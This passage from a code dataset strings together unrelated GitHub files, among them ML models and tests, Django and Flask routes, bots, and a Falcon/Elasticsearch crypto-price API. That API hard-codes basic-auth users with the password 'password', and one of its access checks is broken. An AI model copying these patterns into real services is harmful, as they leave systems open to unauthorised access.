else:\n assert (predictions[\"mean\"] != predictions[\"0.5\"]).any()\n\n\n@pytest.mark.parametrize(\"metric_name\", AVAILABLE_METRICS)\ndef test_when_perfect_predictions_passed_to_metric_then_score_equals_optimum(metric_name):\n prediction_length = 5\n eval_metric = check_get_evaluation_metric(metric_name)\n data = DUMMY_TS_DATAFRAME.copy()\n predictions = data.slice_by_timestep(-prediction_length, None).rename(columns={\"target\": \"mean\"})\n for q in [\"0.1\", \"0.4\", \"0.9\"]:\n predictions[q] = predictions[\"mean\"]\n score = eval_metric.score(data, predictions, prediction_length=prediction_length)\n assert score == eval_metric.optimum\n\n\n@pytest.mark.parametrize(\"metric_name\", AVAILABLE_METRICS)\ndef test_when_better_predictions_passed_to_metric_then_score_improves(metric_name):\n prediction_length = 5\n eval_metric = check_get_evaluation_metric(metric_name)\n data = DUMMY_TS_DATAFRAME.copy()\n predictions = data.slice_by_timestep(-prediction_length, None).rename(columns={\"target\": \"mean\"})\n for q in [\"0.1\", \"0.4\", \"0.9\"]:\n predictions[q] = predictions[\"mean\"]\n good_score = eval_metric.score(data, predictions + 1, prediction_length=prediction_length)\n bad_score = eval_metric.score(data, predictions + 50, prediction_length=prediction_length)\n assert good_score > bad_score\n","repo_name":"autogluon/autogluon","sub_path":"timeseries/tests/unittests/test_metrics.py","file_name":"test_metrics.py","file_ext":"py","file_size_in_byte":10969,"program_lang":"python","lang":"en","doc_type":"code","stars":6431,"dataset":"github-code","pt":"29"} +{"seq_id":"74651054479","text":"\"\"\"Small network model that uses residual learning\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\n\nBATCH_NORMALIZATION_MOMENTUM = 0.997\n\n\ndef batch_norm(input, training):\n \"\"\"Adds batch normalization to graph.\n Args:\n input: previous op/tensor\n training: Indicator for usage while training\"\"\"\n # epsilon use default\n return tf.layers.batch_normalization(input, training=training,\n momentum=BATCH_NORMALIZATION_MOMENTUM, fused=True,\n center=True, scale=True,)\n\n\ndef residual_unit(input, filters_num, kernel_size, training, name):\n \"\"\"Builds one residual unit\n Args:\n input: previous op/tensor\n filters_num: Number of resulting filters / feature-maps\n kernel_size: size of convolution kernel\n training: Indicator for usage while training\n name: name for layer\"\"\"\n with tf.name_scope(name):\n shortcut = input\n first_layer_stride = 1\n # if number of filters is doubled the size of the image representation is halved, shortcut have to be projected\n if int(shortcut.get_shape()[-1]) != filters_num:\n transform_conv = tf.layers.conv2d(input, filters=filters_num, kernel_size=1, strides=2, padding='SAME')\n shortcut = batch_norm(transform_conv, training)\n first_layer_stride = 2\n\n conv_1 = tf.layers.conv2d(input, filters=filters_num, kernel_size=kernel_size, padding='SAME',\n strides=first_layer_stride, use_bias=False)\n bn_1 = batch_norm(conv_1, training)\n relu_1 = tf.nn.relu(bn_1)\n\n conv_2 = tf.layers.conv2d(relu_1, filters=filters_num, kernel_size=kernel_size, padding='SAME',\n use_bias=False)\n bn_2 = batch_norm(conv_2, training)\n residual = tf.add(shortcut, bn_2)\n\n relu_2 = tf.nn.relu(residual)\n return tf.identity(relu_2, name=name)\n\n\ndef build_small_resnet(input, classes_count, training):\n \"\"\"Builds a small resnet model for predicting classes in training or productive mode\n Args:\n input: Tensor that represents input batch. Schema: [NHWC]\n classes_count: Number of classes that should be predicted through this model\n training: Boolean for training (True) or productive usage\"\"\"\n\n with tf.variable_scope('Small_ResNet'):\n # input size 224x224x3\n # output size 112x112x32\n first_conv = tf.layers.conv2d(input, filters=32, kernel_size=7, padding='SAME', strides=2, name=\"First_Conv\")\n first_bn = batch_norm(first_conv, training)\n first_relu = tf.nn.relu(first_bn)\n\n # output size 56x56x32\n max_pool = tf.layers.max_pooling2d(first_relu, pool_size=3, strides=2, padding='SAME', name=\"Max_Pooling\")\n\n # output size 56x56x32\n res_unit_1 = residual_unit(max_pool, filters_num=32, kernel_size=3, training=training, name=\"ResUnit_1\")\n res_unit_2 = residual_unit(res_unit_1, filters_num=32, kernel_size=3, training=training, name=\"ResUnit_2\")\n\n # output size 28x28x64\n res_unit_3 = residual_unit(res_unit_2, filters_num=64, kernel_size=3, training=training, name=\"ResUnit_3\")\n res_unit_4 = residual_unit(res_unit_3, filters_num=64, kernel_size=3, training=training, name=\"ResUnit_4\")\n\n # output size 14x14x128\n res_unit_5 = residual_unit(res_unit_4, filters_num=128, kernel_size=3, training=training, name=\"ResUnit_5\")\n\n # output size 1x1x128\n avg_pool = tf.layers.average_pooling2d(res_unit_5, pool_size=14, padding='VALID', strides=1, name=\"Avg_Pooling\")\n reshaped = tf.reshape(avg_pool, [-1, 128])\n logits = tf.layers.dense(inputs=reshaped, units=classes_count, name=\"Logits\")\n\n return logits\n\n","repo_name":"tkrieger/OpenImagesClassifier","sub_path":"OpenImagesClassifier/small_resnet_model.py","file_name":"small_resnet_model.py","file_ext":"py","file_size_in_byte":3888,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"22327786114","text":"import numpy as np\nimport scipy.linalg\nimport scipy.optimize\n\n\ndef predict_spectrum(ages):\n \"\"\"\n This comes from the `age_modeling.R` script from Wang et al.\n \"\"\"\n alpha = np.array([13.830321, 15.180457, 14.056053, 13.923672, 13.952551, 14.947698])\n beta0 = np.array([-0.316633, -0.327940, -0.322887, -0.329628, -0.321475, -0.326378])\n beta1 = np.array([0.252819, 0.265539, 0.249886, 0.264401, 0.262430, 0.256306])\n p = np.exp(alpha + ages[0] * beta0 + ages[1] * beta1)\n return p / np.sum(p)\n\n\ndef clr(x):\n geom_mean = np.prod(x) ** (1 / len(x))\n return np.log(x / geom_mean)\n\n\ndef cost_func(ages, data, predict_spectrum, proportion=0.1, eur_ages=(22, 22)):\n predicted = (1 - proportion) * predict_spectrum(\n eur_ages\n ) + proportion * predict_spectrum(ages)\n predicted /= predicted.sum()\n dist = scipy.linalg.norm(clr(predicted) - clr(data))\n return dist\n\n\n# observed inferred ages (at 10k gens ago)\nobs_ages = (28, 23)\neur_ages = (20, 20)\n\n# proportion of spectrum from ghost lineage\nproportion = 0.1\n\ndata = predict_spectrum(obs_ages)\nargs = (data, predict_spectrum, proportion, eur_ages)\n\nret = scipy.optimize.fmin_l_bfgs_b(\n cost_func, (30, 30), args=args, approx_grad=True, bounds=[[10, 200], [10, 200]]\n)\n\nprint(ret[0])\n","repo_name":"apragsdale/dated-mutation-spectra","sub_path":"fit_structured_ages.py","file_name":"fit_structured_ages.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"38522269372","text":"# This urls file has:\n# - userena's urlpatterns\n# - our urlpatterns which override userena's urlpatterns\n# - other accounts-related urls\n\nfrom django.conf.urls.defaults import patterns, url, include\nfrom accounts import views as accounts_views\nfrom userena import views as userena_views\n\nurlpatterns = patterns('',\n\n # Overriding userena urlpatterns\n url(r'^signin/$', userena_views.signin,\n {'template_name': 'userena/signin_form.html'},\n name='signin'),\n url(r'^signup/$', accounts_views.user_add,\n name='signup'),\n \n url(r'^emailall/$', accounts_views.email_all,\n name='emailall'),\n # Include userena urls after our urls, so ours take precedence\n (r'', include('userena.urls')),\n)\n","repo_name":"DevangS/CoralNet","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"29"} +{"seq_id":"43021299841","text":"import random\n\nimport face_recognition\nimport cv2\nimport os\nimport numpy as np\n\ndef getAdImages(nameList):\n adImg = []\n for i in nameList:\n # print(i, f'ads/{i}.jpg')\n curImg = cv2.imread(f'ads/{i}.jpg')\n adImg.append(curImg)\n return adImg\n\nkidsAdNames = ['pororo']\nyoungAdNames = ['pororo', 'extreme_sports', 'interior_renovation', 'cigarette']\nseniorAdNames = ['interior_renovation', 'insurance', 'cigarette']\nkidsAd = getAdImages(kidsAdNames)\nyoungAd = getAdImages(youngAdNames)\nseniorAd = getAdImages(seniorAdNames)\n\n\npath = 'faces'\nfiles = [dir for dir in os.listdir(path) if not dir.startswith('.')]\nknownNames = []\nknownList = []\nfor i in files:\n curImg = cv2.imread(f'{path}/{i}')\n encode = face_recognition.face_encodings(curImg)[0]\n knownList.append(encode)\n knownNames.append(os.path.splitext(i)[0].split('.')[0])\n\n\nmatchName = knownNames[0]\ncap = cv2.VideoCapture(0)\nwhile True:\n success, img = cap.read()\n imgSmall = cv2.resize(img, (0, 0), None, 0.25, 0.25)\n imgSmall = cv2.cvtColor(imgSmall, cv2.COLOR_BGR2RGB)\n\n facesCurFrame = face_recognition.face_locations(imgSmall)\n encodeCurFrame = face_recognition.face_encodings(imgSmall, facesCurFrame)\n\n for encodeFace, faceLoc in zip(encodeCurFrame, facesCurFrame):\n faceDis = face_recognition.face_distance(knownList, encodeFace)\n matchIndex = np.argmin(faceDis)\n matchName = knownNames[matchIndex]\n\n y1, x2, y2, x1 = faceLoc\n y1, x2, y2, x1 = y1 * 4, x2 * 4, y2 * 4, x1 * 4\n cv2.rectangle(img, (x1, y1), (x2, y2), (0, 255, 0), 2)\n cv2.rectangle(img, (x1, y2 - 35), (x2, y2), (0, 255, 0), cv2.FILLED)\n cv2.putText(img, matchName, (x1 + 6, y2 - 6), cv2.FONT_HERSHEY_PLAIN, 1, (255, 255, 255), 2)\n\n\n if matchName == 'kids':\n cv2.imshow('Ad', kidsAd[random.randrange(len(kidsAd))])\n elif matchName == 'young':\n cv2.imshow('Ad', youngAd[random.randrange(len(youngAd))])\n else:\n cv2.imshow('Ad', seniorAd[random.randrange(len(seniorAd))])\n\n cv2.imshow('Webcam', img)\n key = cv2.waitKey(1) & 0xFF\n\n if key == ord('q'):\n break\n\n\n","repo_name":"yimethan/computer_vision_study","sub_path":"face-recog/face_recog_age/ad_expose/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"899851369","text":"\"\"\"\nFile for data recording utilities\n\"\"\"\nfrom typing import List\nimport requests\nimport tensorflow_hub as hub\nimport tensorflow as tf\nimport streamlink\nimport sys\nimport cv2\nfrom os.path import dirname\nfrom params_and_keys import *\n\nsys.path.insert(0,dirname(dirname(__file__)))\nfrom predictor.detect_cars import model_predict\n\nmodule_handle = \"https://tfhub.dev/google/faster_rcnn/openimages_v4/inception_resnet_v2/1\"\ndetector = hub.load(module_handle).signatures['default']\nstreams = streamlink.streams(LINK)\n\ndef record_and_store(streams = streams) -> None:\n \"\"\"Records and stores the frames of the video\n \"\"\"\n cap = cv2.VideoCapture(streams[\"best\"].url)\n _, frame = cap.read()\n cv2.imwrite('dataset/frame.jpg', frame)\n\n\n### API part ##################################################\ndef extract_weather_info(weather_api_response: dict[str, float]) -> list[str]:\n \"\"\"Extract info from the weather API response\n \"\"\"\n weather_part = weather_api_response.get(\"weather\", WEATHER_ERROR_WEATHER)[0]\n weather_main, weather_desc = weather_part[\"main\"], weather_part[\"description\"]\n\n temp_data = weather_api_response.get(\"main\", WEATHER_ERROR_TEMP)\n temp, feels_like, temp_min, temp_max, pressure, humidity = temp_data.values()\n\n visibility = weather_api_response.get(\"visibility\", WEATHER_ERROR_VISIBILITY)\n\n wind_info = weather_api_response.get(\"wind\", WEATHER_ERROR_WIND)\n wind_speed, wind_angle= wind_info.get('speed',None),wind_info.get('deg',None)\n\n cloud_info = weather_api_response.get(\"clouds\", WEATHER_ERROR_CLOUD)\n clouds = cloud_info[\"all\"]\n\n total_info = [weather_main, weather_desc, temp, feels_like, temp_min, temp_max,\n pressure, humidity, visibility, wind_speed, wind_angle, clouds]\n\n return total_info\n\n\ndef extract_traffic_info(traffic_api_response: dict[str, float]) -> list[str]:\n \"\"\"Extract info from the traffic API response\n \"\"\"\n\n incidents = traffic_api_response.get(\"incidents\", None)\n if incidents:\n maximum_severity = max([incident.get(\"severity\", 0) for incident in incidents])\n total_impacting = sum([incident.get(\"impacting\", 0) for incident in incidents])\n total_delays_free_flow = sum([incident.get(\"delayFromFreeFlow\", 0) for incident in incidents])\n total_delays_typical = sum([incident.get(\"delayFromTypical\", 0) for incident in incidents])\n else:\n return [None, None, None, None]\n\n return [maximum_severity, total_impacting, total_delays_free_flow, total_delays_typical]\n\n\ndef call_apis(LAT=LAT_TIMES, LONG=LONG_TIMES, box_left=LEFT_TIMES,\n box_up=UP_TIMES, box_right=RIGHT_TIMES, box_down=DOWN_TIMES) -> List[str]:\n \"\"\"Call the extra data apis\n \"\"\"\n weather_call = create_weather_link(LAT, LONG, WEATHER_API_KEY)\n\n traffic_call = create_incidents_link(TRAFFIC_API_KEY, box_left, box_up, box_right, box_down)\n\n weather_info = requests.get(weather_call).json()\n traffic_info = requests.get(traffic_call).json()\n\n weather_info = extract_weather_info(weather_info)\n traffic_info = extract_traffic_info(traffic_info)\n\n for info in traffic_info:\n weather_info.append(info)\n\n all_api_responses = [str(column) for column in weather_info]\n return all_api_responses\n\n\n#################################################################\n\ndef model_predictor(img_path, detector):\n \"\"\"Predictions on the stores frames\n \"\"\"\n with tf.device('/CPU:0'):\n return model_predict(img_path, detector)\n\nif __name__ == \"__main__\":\n print(call_apis())\n record_and_store()","repo_name":"anryabrahamyan/Road_Traffic_Prediction","sub_path":"record_camera/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"73725113039","text":"from django.urls import path\n\nfrom .views import PostCreateView, PostDetailView, PostSearchView, PostDeleteView, PostEditView\n\napp_name = 'posts'\nurlpatterns = [\n path('create_post/', PostCreateView.as_view(), name='create'),\n path('post_detail//', PostDetailView.as_view(), name='detail'),\n path('search/', PostSearchView.as_view(), name='search'),\n path('delete//', PostDeleteView.as_view(), name='delete'),\n path('edit//', PostEditView.as_view(), name='edit'),\n]\n","repo_name":"delterr/Posterr","sub_path":"posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"26999366633","text":"# Python Crash Course: Chapter 10, Eric Matthews, Files and Exceptions\n\n# FileNotFoundError example\nfilename = 'alice.txt'\n\n# comment this section to test working solution.\n# with open(filename, encoding='utf-8') as f:\n# contents = f.read()\n# delete from here down to get error.\n\ntry:\n with open(filename, encoding='utf-8') as f:\n contents = f.read()\nexcept FileNotFoundError:\n print(f\"Sorry, the file {filename} does not exist.\")\n# Move file into same location to split the file text.\nelse:\n # Count the number of words in the title.\n words = contents.split()\n num_words = len(words)\n print(f\"The file {filename} contains {num_words}.\")\n","repo_name":"JAL-code/python_work","sub_path":"files_and_exceptions/alice.py","file_name":"alice.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"72566817678","text":"from .tools import VkuserbotClass\nfrom typing import Dict, Any\nimport vkuserbot.user as user\n\n\nclass Longpoll(VkuserbotClass):\n def __init__(self, bot: \"user.User\") -> None:\n self._bot = bot\n bot.loop.run_until_complete(\n self._init_longpoll()\n )\n\n async def _init_longpoll(self) -> None:\n self._longpoll = await self._bot.method(\"messages.getLongPollServer\")\n self._longpoll_url = \"https://\" + self._longpoll[\"server\"]\n self.ts = self._longpoll[\"ts\"]\n\n async def listener(self) -> Dict[str, Any]:\n while True:\n self._longpoll_result = await self._bot.post(self._longpoll_url, {\n \"act\": \"a_check\",\n \"key\": self._longpoll[\"key\"],\n \"ts\": self.ts,\n \"wait\": 1,\n \"mode\": 2,\n \"version\": 3\n })\n self.ts = self._longpoll_result[\"ts\"]\n if \"updates\" not in self._longpoll_result:\n continue\n for update in self._longpoll_result[\"updates\"]:\n self.event = update[0]\n for handle in self._bot._events_to_handle:\n await self._bot._check_handle(handle)\n if self.event != 4:\n continue\n vk_event = await self._bot.method(\n \"messages.getById\", {\"message_ids\": update[1]}\n )\n yield vk_event[\"items\"][0]\n","repo_name":"quakedog/vkuserbot","sub_path":"vkuserbot/longpoll.py","file_name":"longpoll.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"27385462249","text":"from imports import *\ncon = connection.Con()\njsons = jsons.jsons()\nrooms = db.Rooms()\ndb = db.Database()\n#csgo = csko.csko()\nto_img = img.Img()\n\n\nclass Test(commands.Cog):\n\n def __init__(self, client):\n self.client = client\n self.tools = tools.Tools(client, jsons)\n\n @commands.command(name='test', hidden=True, aliases=[])\n async def test(self, ctx):\n can = await self.tools.check_role(ctx, 'admin')\n if can:\n guild = ctx.author\n\n\ndef setup(client):\n client.add_cog(Test(client))\n","repo_name":"Slayerovec/Projects","sub_path":"Groot/cogs/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"13364472175","text":"from django.urls import path,include\nfrom . import views\n\nurlpatterns = [\n path(\"\",views.Singup_page,name=\"signup_page\"),\n path(\"signup_logic/\",views.Signup_logic,name=\"signup_logic\"),\n path(\"login_page/\",views.Login_page,name=\"login_page\"),\n path(\"login_logic/\",views.Login_logic,name=\"login_logic\"),\n path(\"user_data/\",views.User_data,name=\"user_data\"),\n path(\"get_data/\",views.get_Data,name=\"get_data\"),\n path(\"update/logic/\",views.Update_logic,name=\"update_logic\"),\n path(\"delete_data/\",views.Delete_data,name=\"delete_data\"),\n]\n","repo_name":"ython123/Login-and-registratin-or-crud-operations-","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"18276664949","text":"import pytest\nfrom APItest.common.ReadExcelData import Readexceldata\nfrom APItest.request_method.requesttest import RequestMethod\n\n\n\n\n\n\nclass TestInteerface:\n da = Readexceldata().paramsexpectdata()\n def setup_class(self):\n self.res = RequestMethod()\n\n @pytest.mark.parametrize(\"row,expect\", da)\n def test_01(self, row, expect):\n print(expect)\n if expect:\n actual = self.res.get_regular_actual(row)\n print(actual)\n assert expect == actual\n else:\n self.res.get_response(row)","repo_name":"LiuHongCan/MYtemplate","sub_path":"pytestinterface/APItest/Case/test_demo.py","file_name":"test_demo.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"5565091465","text":"from datetime import datetime\nimport elasticsearch\nimport json\nimport falcon\nimport requests\nfrom falcon_auth import FalconAuthMiddleware, BasicAuthBackend\n\nelasticsearch_host = ['52.169.143.2:9200']\n\nhttpauth = {}\nhttpauth['user1'] = \"password\"\nhttpauth['user2'] = \"password\"\n\nclass StatusResource:\n def on_get(self, req, resp):\n\n try:\n es = elasticsearch.Elasticsearch(elasticsearch_host)\n health = es.cluster.health()\n if health['status'] != 'green' or health['status'] != 'yellow':\n resp.status = falcon.HTTP_500\n resp.body = json.dumps(health['status'], ensure_ascii=False)\n resp.status = falcon.HTTP_200\n except elasticsearch.ElasticsearchException:\n resp.media = \"ElasticSearch ConnectionRefusedError\"\n resp.status = falcon.HTTP_500\n\nclass LatestAllResource:\n def on_get(self, req, resp):\n\n if req.context['user']['username'] not in httpauth:\n resp.status = falcon.HTTP_401\n return\n\n if req.context['user']['password'] != httpauth[req.context['user']['username']]:\n resp.status = falcon.HTTP_401\n return\n\n try:\n es = elasticsearch.Elasticsearch(elasticsearch_host)\n indices = es.indices.get_alias(\"coining_latest_*\")\n available_coins = []\n for item in indices:\n coin = item.split('coining_latest_')\n available_coins.append(coin[1])\n\n doc = {\n 'available_coins': available_coins\n }\n resp.body = json.dumps(doc, ensure_ascii=False)\n resp.status = falcon.HTTP_200\n \n except elasticsearch.ElasticsearchException:\n resp.media = \"ElasticSearch ConnectionRefusedError\"\n resp.status = falcon.HTTP_500\n\nclass CoinmarketcapCoinResource:\n\n def on_get(self, req, resp, coin):\n\n if req.context['user']['username'] not in httpauth:\n resp.status = falcon.HTTP_401\n return\n\n if req.context['user']['password'] != httpauth[req.context['user']['username']]:\n resp.status = falcon.HTTP_401\n return\n\n query = json.dumps({\n \"query\": {\n \"range\": {\n \"last_updated\": {\n \"gte\": \"now-25h\",\n \"lt\": \"now\"\n }\n }\n },\n \"sort\": [{\"last_updated\": {\"order\": \"asc\"}}],\n \"size\": 1500\n })\n\n try:\n es = elasticsearch.Elasticsearch(elasticsearch_host)\n result = es.search(index=\"coinmarketcap_\"+str(coin), doc_type=\"coinmarketcap\", body=query)\n except elasticsearch.ElasticsearchException:\n resp.media = \"ElasticSearch ConnectionRefusedError\"\n resp.status = falcon.HTTP_500\n\n resp.body = json.dumps(result, ensure_ascii=False)\n resp.status = falcon.HTTP_200\n\nclass CoinmarketcapUpdateResource:\n\n def on_get(self, req, resp):\n\n if req.context['user']['username'] not in httpauth:\n resp.status = falcon.HTTP_401\n return\n\n if req.context['user']['password'] != httpauth[req.context['user']['username']]:\n resp.status = falcon.HTTP_401\n return\n\n response = requests.get('https://api.coinmarketcap.com/v1/ticker/?limit=0')\n json_data = json.loads(response.text)\n\n available_coins = ['iota', 'siacoin', 'ethereumclassi', 'verge', 'digibyte', 'ripple', 'zcash', 'bitcoin', 'litecoin', 'waves', 'monacoin', 'ethereum', 'strati', 'komodo', 'ark', 'monero', 'qtum', 'decred', 'bitshare', 'nxt', 'golem', 'vertcoin', 'veritaseum', 'dash', 'ardor', 'nem', 'lisk', 'reddcoin', 'stellar']\n\n for coin in json_data:\n result = {}\n if coin['id'] in available_coins:\n result['id'] = coin['last_updated']\n result['index'] = coin['id']\n result['last_updated'] = datetime.fromtimestamp(int(coin['last_updated'])).astimezone(tz=None).isoformat()\n result['rank'] = int(coin['rank'])\n result['price_usd'] = float(coin['price_usd'])\n result['price_btc'] = float(coin['price_btc'])\n result['24h_volume_usd'] = float(coin['24h_volume_usd'])\n result['market_cap_usd'] = float(coin['market_cap_usd'])\n result['available_supply'] = float(coin['available_supply'])\n result['total_supply'] = float(coin['total_supply'])\n result['max_supply'] = coin['max_supply']\n result['percent_change_1h'] = coin['percent_change_1h']\n result['percent_change_24h'] = coin['percent_change_24h']\n result['percent_change_7d'] = coin['percent_change_7d']\n\n try:\n es = elasticsearch.Elasticsearch(elasticsearch_host)\n es.index(index=\"coinmarketcap_\"+str(result['index']), doc_type=\"coinmarketcap\", id=result['id'], body=result)\n except elasticsearch.ElasticsearchException:\n resp.media = \"ElasticSearch ConnectionRefusedError\"\n resp.status = falcon.HTTP_500\n\n resp.status = falcon.HTTP_200\n\nclass LatestCoinResource:\n def on_get(self, req, resp, coin):\n\n if req.context['user']['username'] not in httpauth:\n resp.status = falcon.HTTP_401\n return\n if req.context['user']['password'] != httpauth[req.context['user']['password']]:\n resp.status = falcon.HTTP_401\n return\n \n try:\n es = elasticsearch.Elasticsearch(elasticsearch_host)\n result = es.search(index='coining_latest_%s' % (coin), doc_type=\"coining_latest\")\n \n if len(result['hits']['hits']) != 1:\n resp.status = falcon.HTTP_500\n\n resp.body = json.dumps(result['hits']['hits'][0]['_source'], ensure_ascii=False)\n resp.status = falcon.HTTP_200\n\n except elasticsearch.ElasticsearchException:\n resp.media = \"ElasticSearch ConnectionRefusedError\"\n resp.status = falcon.HTTP_500\n\n\n def on_post(self, req, resp, decision, coin, last_upd):\n print(\"storing decision for\", coin)\n doc_type = \"coining\"\n index = doc_type + \"_\" + coin\n id = int(last_upd.tolist() / 1e9)\n\n latest_doc_type = \"coining_latest\"\n latest_index = latest_doc_type + \"_\" + curr\n\n last_upd = datetime.datetime.fromtimestamp(id)\n body = {\n \"currency\": curr,\n \"last_updated\": last_upd,\n **decision\n }\n d = dict(index=index, doc_type=doc_type, id=id, body=body)\n d_latest = dict(index=latest_index, doc_type=latest_doc_type, id=1, body=body)\n print(d)\n print(d_latest)\n #self.es.index(**d)\n #self.es.index(**d_latest)\n resp.status = falcon.HTTP_200\n\nuser_loader = lambda username, password: { 'username': username , 'password': password }\nauth_backend = BasicAuthBackend(user_loader)\n\nauth_middleware = FalconAuthMiddleware(auth_backend,exempt_routes=['/api/status'])\napi = falcon.API(middleware=[auth_middleware])\napi.add_route('/api/status', StatusResource())\napi.add_route('/api/latest/all', LatestAllResource())\n\n# Get Latest / Post Latest from AI\napi.add_route('/api/latest/{coin}', LatestCoinResource())\n\n# Get Latest / Post Latest from coinmarketcap\napi.add_route('/api/coinmarketcap/{coin}', CoinmarketcapCoinResource())\napi.add_route('/api/coinmarketcap/update', CoinmarketcapUpdateResource())\n\n","repo_name":"arenstar/neuro-api","sub_path":"neuro.py","file_name":"neuro.py","file_ext":"py","file_size_in_byte":7647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"71564434958","text":"from flask import Flask , request\napp = Flask(__name__)\n\n@app.route(\"/\", methods=['GET'])\ndef main():\n\treturn \"Hello, How are you doing?\"\n\n@app.route(\"/data\", methods=['POST'])\ndef data_forms():\n\tperson_name = request.form.get('person_name')\n\treturn \"His name is {}\".format(person_name)\n\n\nif __name__ == '__main__':\n\tapp.run(debug=True)\n","repo_name":"Bijay555/Leapfrog-internship-assignment","sub_path":"git-assignment/flask-example.py","file_name":"flask-example.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"10171692257","text":"num = int(input('Digite um valor numerico decimal aqui: '))\nescolha = int(input('Escolha para qual base deseja converter o valor numerico:'\n '\\n (1) Binario\\n (2) Octal\\n (3) Hexadecimal\\nSua Escolha: '))\nif escolha == 1:\n print('O numero {} em binario é {}'.format(num, bin(num)[2:]))\nelif escolha == 2:\n print('O número {} em Octal é {}'.format(num, oct(num)[2:]))\nelif escolha == 3:\n print('O número {} em Hexadecimal é {}'.format(num, hex(num)[2:]))\nelse:\n print('Escolha uma opção valida!')\n","repo_name":"talessantos49/Primeiros_Passos","sub_path":"Cursos-Extras/Python/ex037.py","file_name":"ex037.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"22563473158","text":"from re import L\nimport sys\n\nsys.stdin = open(\"_소득불균형.txt\")\n\nt = int(input()) #테스트 케이스\n\nfor i in range(t): \n n = int(input())\n lst = list(map(int,input().split())) #리스트로 받기\n sum_= sum(lst) #합 계산\n total = len(lst) #리스트 길이 개수로 받음\n avg = sum_/total\n lst2 = [] #빈 리스트\n for j in range(len(lst)):\n if avg >= lst[j]: #평균보다 리스트의 값이 작거나 같으면\n lst2.append(j) #빈 리스트에 추가\n print(f'#{i+1} {len(lst2)}') #lst2의 길이 = 사람 수\n","repo_name":"rhoeunbin/01-PJT-03","sub_path":"2회차/노은빈/1_소득불균형.py","file_name":"1_소득불균형.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"ko","doc_type":"code","dataset":"github-code","pt":"29"} +{"seq_id":"4524230938","text":"def fibSuma():\r\n\tn1=0\r\n\tn2 =1\r\n\tsuma =0\r\n\tprint(\"Calculando....\")\r\n\tfor x in range(0, 99):\r\n\t\ttotal = n1 + n2\r\n\t\tif total > 99:\r\n\t\t\tbreak\r\n\t\telif total <= 99:\r\n\t\t\tsuma += total\r\n\t\t\tprint(\"Sumando\\t[ \",n1,\" + \", n2,\" ] = [ \",total, \" ] \\t Acumulando -->[ \",suma, \" ]\")\r\n\t\t\tn1 = n2\r\n\t\t\tn2 = total\r\n","repo_name":"carlosgm128/python","sub_path":"FibSuma.py","file_name":"FibSuma.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"17999944647","text":"import pandas as pd\nimport gmplot\nfrom os import path\nimport psycopg2\nimport os\nimport reverse_geocode\nfrom geopy.geocoders import Nominatim\nimport threading\nimport folium\nfrom folium.plugins import HeatMap\nimport ast\n\n\nfrom IPython.display import display\n\ndef run_query(query):\n try:\n connection = psycopg2.connect(user = \"\",\n password = \"\",\n host = \"\",\n port = \"5432\",\n database = \"\")\n\n cursor = connection.cursor()\n cursor.execute(query)\n rows = cursor.fetchall()\n return rows\n except (Exception, psycopg2.Error) as error :\n print (\"Error while connecting to PostgreSQL\", error)\n finally:\n #closing database connection.\n if(connection):\n cursor.close()\n connection.close()\n print(\"PostgreSQL connection is closed\")\n\n# def make_heatmap_ghtorrent():\n# query='''\n# SELECT long, lat\n# FROM users\n# WHERE (long IS NOT NULL AND long != 0) AND lat IS NOT NULL\n# LIMIT 500000\n# '''\n\n# rows = run_query(query)\n# [longitudes, latitudes] = [[ i for i, j in rows ], [ j for i, j in rows ]]\n# gmap = gmplot.GoogleMapPlotter(34.0522, -118.2437, 0)\n# gmap.heatmap(latitudes, longitudes)\n# gmap.draw(\"user_heatmap.html\")\n\ndef geocode(location, count, f):\n try:\n geolocator = Nominatim(timeout=100, user_agent='github_heatmap')\n location = geolocator.geocode(location)\n print(str([location, count, location.latitude, location.longitude]))\n f.write(str([location, count, location.latitude, location.longitude]) + '\\n')\n except:\n pass\n\n\ndef get_coordinates():\n query='''\n\tSELECT location, COUNT(*) as count\n\tFROM github_users\n\tWHERE \n\t\t(location IS NOT NULL and location !='null') AND\n\t\tLOWER(location) NOT LIKE '%india%' AND\n\t\tLOWER(location) NOT LIKE '%china%'\n\tGROUP BY location\n\tHAVING COUNT(*) > 100 AND COUNT(*) < 111\n\tORDER BY count DESC\n '''\n\n rows = 